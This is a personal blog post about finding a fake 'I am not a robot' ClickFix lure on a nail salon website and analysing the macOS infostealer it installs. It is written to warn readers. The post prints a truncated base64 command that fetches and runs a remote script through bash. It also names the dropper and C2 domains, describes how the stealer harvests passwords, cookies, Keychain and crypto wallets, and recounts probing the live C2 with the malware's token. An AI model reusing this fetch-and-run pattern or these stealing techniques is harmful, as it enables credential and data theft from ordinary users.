Soooo when I go to Spain, I like to treat myself. One thing in particular is to get my nails done.

As I was preparing for my trip, I decided I’d book an appointment at the nail salon I usually go to. To my surprise, the website showed a weird page.

Discovery

(I can’t explain why I took a photo with my phone instead of a screenshot… I panicked ok???)

I had heard of this phishing method before, and I immediately recognized it was malicious. I got so excited that I could investigate this.

The third instruction saying to “copy the command” using the copy button makes a normal user think they are coping the ‘I am not a robot’ text.

Don’t be fooled! That is NOT the text you are copying. Also, that command makes no sense btw. If you actually copied what they suggest into your terminal you’d get:

command not found: I

Anyway, the real command you were copying is this (I’m trimming the command):

echo "Y3VybCAtc0wgIiQoZWNobyAnYmx[..]" | base64 -d | bash

“AH! INTERESTING”, I thought.

This decodes to a curl to another base64 encoded string:

curl -sL "$(echo 'aHR0c[..]' | base64
-d)" | nohup bash

What’s happening here is they are downloading a file on your machine and executing it. That’s hella dangerous. You’d have NO idea if you weren’t in infosec or IT. But also, it happens so quickly, even if you did notice something weird, the script would start running.

The osascript that gets downloaded on your machine (and in particular for me, on MacOS) is an infostealer malware. It will steal browser passwords, cookies, crypto wallets, Keychain, Apple Notes, etc… It also spawns a dialog to trick the user into enter their password so they can run sudo commands.

It saves the password entered into ~/.pwd, so it can just read from that file whenever it performs privileged commands… silent re-infection.

This was most definitely written with AI, I mean who in their right mind would…idk..?

Anyways, it zip’s it all up and sends it to another server.

Also the “devs” weren’t quite done yet… still implementing a Ledger Live stealer, so they just commented it out.

So to sum up, we have the dropper (the curl to the malicious website which hosts the osascript), and the C2 (where our stolen info is sent to). Then, it deletes all traces.

Dropper: mekoilsuharum.com
C2 server: uterimoxis.com

The infrastructure

Okay so I’m not used to doing threat intel and so on, so this is what I have regarding the empire.

The attackers split their operation across two continents. The dropper (the server that hosts the malware script) was hosted in Europe. The C2 server, which receives the stolen data, was hosted in the United States under a small ISP in Michigan.

Both domains were registered through Njalla, an anonymous registrar incorporated in Nevis, a small Caribbean island nation with minimal legal cooperation agreements. Njalla accepts cryptocurrency payments, requires no identity verification, and legally acts as the owner of record for all domains registered through them.

However, I did notify them and they were very quick to respond. I haven’t heard anything back from them but I hope to believe they took care of it.

The dropper and the C2

The dropper’s only job is to serve the malware script when a victim runs the curl command. It’s basically the delivery mechanism. The C2 is where the stolen data is zip’d and ship’d to.

They are independent by design. When the dropper was taken down, no new victims could be infected, but the C2 continued to collect data from machines that were already compromised.

As of writing, both the C2 and the dropper seem to be down (I might or not have had something to do with this 🤷‍♀️).

Probing (lightly)

I kinda wanted to poke the bear and dig a bit deeper. To do this safely, I spun up a disposable DigitalOcean server.

I grabbed the authentication token from the osascript and attempted to make a POST request to the health endpoint /api/health. The C2 responded with:

  {"data":null,"success":true}

The server was indeed alive, authenticated, and ready to receive stolen data from victims. I also got information on the stack: OpenResty sitting in front of a Node.js Express backend, running HTTP/2 over TLS 1.3 with a Let’s Encrypt certificate issued just weeks earlier on March 24, 2026. This was a fresh operation.

I tried to dig deeper: fuzzing the API for hidden endpoints, hunting for an admin panel, probing subdomains. Nothing.

They are pros. No guessable paths, randomised URLs, and a panel that either didn’t exist publicly or was locked to their IP only. Either that, or skill issue on my side (most probable).

Conclusion

I didn’t set out to investigate a malware campaign. I panicked, took a photo with my phone like a grandma, and then got completely sucked into a rabbit hole that ended with me poking a live C2 server from a disposable VM in the cloud while eating lunch.

But that’s kind of the point. This attack wasn’t targeting security researchers. It was targeting normal people, people booking nail appointments, people who happen to own crypto, people who would see a “prove you’re not a robot” prompt and not think twice. The command makes no sense if you look closely, but most people don’t look closely. That’s the whole bet.

The takeaway is simple: never paste a command from a website into your terminal. It doesn’t matter how legitimate the page looks. No website on earth needs you to open Terminal to prove you’re human.

For me personally, this was a first real dive into threat intelligence and active infrastructure analysis. I made mistakes, learned a lot, and got surprisingly far for someone who just wanted a manicure 💅🏼.

The C2 is down now. The dropper is down. The nail salon is clean. And I got a fun set of nails.

IOC table